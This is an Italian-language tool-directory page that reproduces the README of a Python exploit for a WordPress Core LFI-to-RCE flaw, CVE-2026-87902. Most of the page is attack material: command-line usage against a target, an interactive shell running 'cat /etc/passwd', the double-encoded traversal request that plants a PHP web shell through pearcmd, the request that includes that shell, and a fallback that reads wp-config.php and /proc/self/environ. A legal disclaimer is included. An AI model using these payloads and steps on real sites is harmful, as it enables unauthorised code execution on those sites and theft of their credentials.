Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2026-87902 — Exploit Python per CVE-2026-87902, una catena LFI-to-RCE di WordPress Core. Identifica le versioni, scrive una shell PHP tramite pearcmd e fornisce esecuzione di comandi o fallback LFI. | Kitploit
Strumenti/GitHubGitHub/zyphorixofficialmain-lab/cve-2026-87902
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPost-ExploitSicurezza WebPenetration TestingStrumento di Accesso Remoto
Sviluppo Payload
GitHubzyphorixofficialmain-lab/cve-2026-87902

cve-2026-87902

Exploit Python per CVE-2026-87902, una catena LFI-to-RCE di WordPress Core. Identifica le versioni, scrive una shell PHP tramite pearcmd e fornisce esecuzione di comandi o fallback LFI.

Vedi Repository
413h 52m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

cve-2026-87902

CVE-2026-87902 – Exploit LFI to RCE di WordPress Core (Edizione Auto-Forcing)

creato da alfaris

⚠️ AVVISO LEGALE L'utilizzo contro sistemi di cui non si è proprietari o per cui non si ha il permesso scritto di testare è illegale e punibile ai sensi delle leggi sui crimini informatici. L'autore non si assume alcuna responsabilità per usi impropri.


📌 Riepilogo della Vulnerabilità

CampoValore
CVECVE-2026-87902
TipoLocal File Inclusion (LFI) → Remote Code Execution (RCE)
CWECWE-98
CVSS v3.19.2 (Critico)
Vettore di AttaccoRete (Non Autenticato)
AffettoWordPress 4.7.0 – 7.1.1
CorrettoWordPress 7.1.2 (e backport fino a 4.7.37)
Causa Principaleget_page_template() non chiama validate_file() dopo la decodifica URL del parametro pagename, consentendo il traversal con doppia codifica (%252E%252E%252F) per aggirare la sanificazione e includere file .php arbitrari al di fuori della directory del tema.

Precondizioni per RCE

Per il pieno RCE, tutte le seguenti condizioni devono essere vere:

  1. Versione di WordPress tra 4.7.0 e 7.1.1
  2. Il tema attivo contiene una directory page-* di primo livello (es. page-templates/)
  3. Esiste almeno una pagina pubblicata
  4. pearcmd.php è presente e leggibile dall'utente del server web (predefinito nelle immagini Docker ufficiali di PHP e in molte installazioni cPanel con PHP < 8.5)
  5. PHP ha register_argc_argv=On (predefinito in PHP < 8.5)
  6. Il sistema operativo host è Linux (la sintassi di traversal di Windows è diversa)

Se una di queste manca, l'exploit ricadrà sulla lettura di file solo LFI.


📂 File

exploit.py # Script di exploit principale README.md # Questo file report.json # (opzionale) Report di output quando si usa -o

⚙️ Requisiti

  • Python 3.8+
  • Libreria requests

Installazione:

root@kitploit:~
apt update
apt upgrade
apt install python
apt install git
root@kitploit:~
pip install requests
root@kitploit:~
git clone https://github.com/zyphorixofficialmain-lab/cve-2026-87902
cd cve-2026-87902
  1. Scansione di base (verbose)
root@kitploit:~
python3 exploit.py -t https://site.com -v

Questo:

· Rileva la versione di WordPress e il tema attivo · Verifica l'intervallo di versioni vulnerabili · Individua un ID di pagina pubblicata (REST → sitemap → brute force) · Tenta di scrivere una shell PHP tramite pearcmd.php · Tenta di includere la shell ed eseguire id · Se RCE fallisce, ricade su LFI su file sensibili

  1. Esegui un singolo comando
root@kitploit:~
python3 exploit.py -t https://site.com -c "id"
  1. Shell interattiva (solo se RCE è riuscito)
root@kitploit:~
python3 exploit.py -t https://site.com -i -v

All'interno della shell:

root@kitploit:~
wp$ id
wp$ uname -a
wp$ cat /etc/passwd
wp$ exit
  1. Salva il report in JSON
root@kitploit:~
python3 exploit.py -t https://site.com -o report.json -v
  1. Combina le opzioni
root@kitploit:~
python3 exploit.py -t https://site.com -c "whoami" -o report.json -v

🧾 Riferimento CLI

Flag Long Descrizione -t --target Obbligatorio. URL WordPress di destinazione (senza slash finale). -c --command Esegue un singolo comando shell dopo RCE. -i --interactive Apre una shell interattiva dopo RCE. -v --verbose Stampa l'avanzamento dettagliato. -o --output Salva il report finale come JSON nel percorso indicato. -h --help Mostra l'aiuto.

🔄 Flusso dell'Exploit

root@kitploit:~
[1] Fingerprint
      ├─ WordPress version (meta generator / asset ?ver=)
      └─ Active theme (/wp-content/themes/<name>/)

[2] Version check
      └─ 4.7.0 – 7.1.1 ? continue : warn & continue

[3] Find page ID
      ├─ REST: /wp-json/wp/v2/pages
      ├─ Sitemap: /wp-sitemap.xml
      └─ Brute force: /?page_id=1..30

[4] Check page-* directory
      ├─ page-templates
      ├─ page-template
      ├─ pages
      ├─ templates
      └─ page

[5] Write shell via pearcmd
      └─ POST /?+config-create+/&page_id=<id>&pagename=templates%252F..%252F..%252Fusr%252Flocal%252Flib%252Fphp%252Fpearcmd
         body: root=<?php system($_GET['c']); ?>

[6] Include shell
      └─ GET /?page_id=<id>&pagename=templates%252F..%252F..%252Ftmp%252F<shell>.php&c=id

[7] Fallback LFI (if RCE fails)
      ├─ /etc/passwd
      ├─ /etc/hostname
      ├─ /proc/self/environ
      ├─ /proc/version
      ├─ wp-config.php
      └─ ../.. variants
Scarica lo strumento